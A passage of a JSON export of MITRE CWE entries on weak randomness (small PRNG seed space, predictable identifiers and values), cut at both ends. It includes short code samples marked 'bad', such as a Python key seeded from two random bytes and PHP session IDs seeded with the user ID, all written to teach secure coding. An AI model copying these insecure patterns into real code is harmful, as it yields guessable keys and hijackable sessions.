65,536 unique keys.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Non-cryptographic PRNG"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Non-cryptographic PRNG","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Cryptographically Weak PRNG","attr":{"@_Date":"2014-06-23"}}]}},"339":{"attr":{"@_ID":"339","@_Name":"Small Seed Space in PRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks.","Extended_Description":"PRNGs are entirely deterministic once seeded, so it should be extremely difficult to guess the seed. If an attacker can collect the outputs of a PRNG and then brute force the seed by trying every possibility to see which seed matches the observed output, then the attacker will know the output of any subsequent calls to the PRNG. A small seed space implies that the attacker will have far fewer possible values to try to exhaust all possibilities.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"341","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use well vetted pseudo-random number generating algorithms with adequate length seeds. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a \\"random enough\\" number."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code grabs some random bytes and uses them for a seed in a PRNG, in order to generate a new cryptographic key.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"seed = os.urandom(2)random.seed(a=seed)key = random.getrandbits(128)","xhtml:i":"# getting 2 bytes of randomness for the seeding the PRNG","xhtml:br":["","","",""]}},"Body_Text":"Since only 2 bytes is used as a seed, an attacker will only need to guess 2^16 (65,536) values before being able to replicate the state of the PRNG."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-10908","Description":"product generates passwords via org.apache.commons.lang.RandomStringUtils, which uses java.util.Random internally. This PRNG has only a 48-bit seed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10908"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Small Seed Space in PRNG"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}}]},"Notes":{"Note":[{"#text":"This entry may have a chaining relationship with predictable from observable state (CWE-341).","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References"}]}},"340":{"attr":{"@_ID":"340","@_Name":"Generation of Predictable Numbers or Identifiers","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a scheme that generates numbers or identifiers that are more predictable than required.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictability problems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Predictability Problems","attr":{"@_Date":"2020-02-24"}}}},"341":{"attr":{"@_ID":"341","@_Name":"Predictable from Observable State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"This weakness could be exploited by an attacker in a number ways depending on the context. If a predictable number is used to generate IDs or keys that are used within protection mechanisms, then an attacker could gain unauthorized access to the system. If predictable filenames are used for storing sensitive information, then an attacker might gain access to the system and may be able to gain access to the information in the file."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code generates a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0389","Description":"Mail server stores private mail messages with predictable filenames in a world-executable directory, which allows local users to read private mailing list archives.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0389"},{"Reference":"CVE-2001-1141","Description":"PRNG allows attackers to use the output of small PRNG requests to determine the internal state information, which could be used by attackers to predict future pseudo-random numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1141"},{"Reference":"CVE-2000-0335","Description":"DNS resolver library uses predictable IDs, which allows a local attacker to spoof DNS query results.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335"},{"Reference":"CVE-2005-1636","Description":"MFV. predictable filename and insecure permissions allows file modification to execute SQL queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1636"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable from Observable State"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"342":{"attr":{"@_ID":"342","@_Name":"Predictable Exact Value from Previous Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An exact value or random number can be precisely predicted by observing previous values.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1463","Description":"Firewall generates easily predictable initial sequence numbers (ISN), which allows remote attackers to spoof connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1463"},{"Reference":"CVE-1999-0074","Description":"Listening TCP ports are sequentially allocated, allowing spoofing attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0074"},{"Reference":"CVE-1999-0077","Description":"Predictable TCP sequence numbers allow spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0077"},{"Reference":"CVE-2000-0335","Description":"DNS resolver uses predictable IDs, allowing a local user to spoof DNS query results.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Exact Value from Previous Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"343":{"attr":{"@_ID":"343","@_Name":"Predictable Value Range from Previous Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software\'s random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated.","Extended_Description":"The output of a random number generator should not be predictable based on observations of previous values. In some cases, an attacker cannot predict the exact value that will be produced next, but can narrow down the possibilities significantly. This reduces the amount of effort to perform a brute force attack. For example, suppose the product generates random numbers between 1 and 100, but it always produces a larger value until it reaches 100. If the generator produces an 80, then the attacker knows that the next value will be somewhere between 81 and 100. Instead of 100 possibilities, the attacker only needs to consider 20.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Value Range from Previous Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-320"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"344":{"attr":{"@_ID":"344","@_Name":"Use of Invariant Value in Dynamically Changing Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a constant value, name, or reference, but this value can (or should) vary across different environments.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0980","Description":"Component for web browser writes an error message to a known location, which can then be referenced by attackers to process HTML/script in a less restrictive context","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0980"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Static Value in Unpredictable Context"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-267"}}},"Notes":{"Note":{"#text":"overlaps default configuration.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content 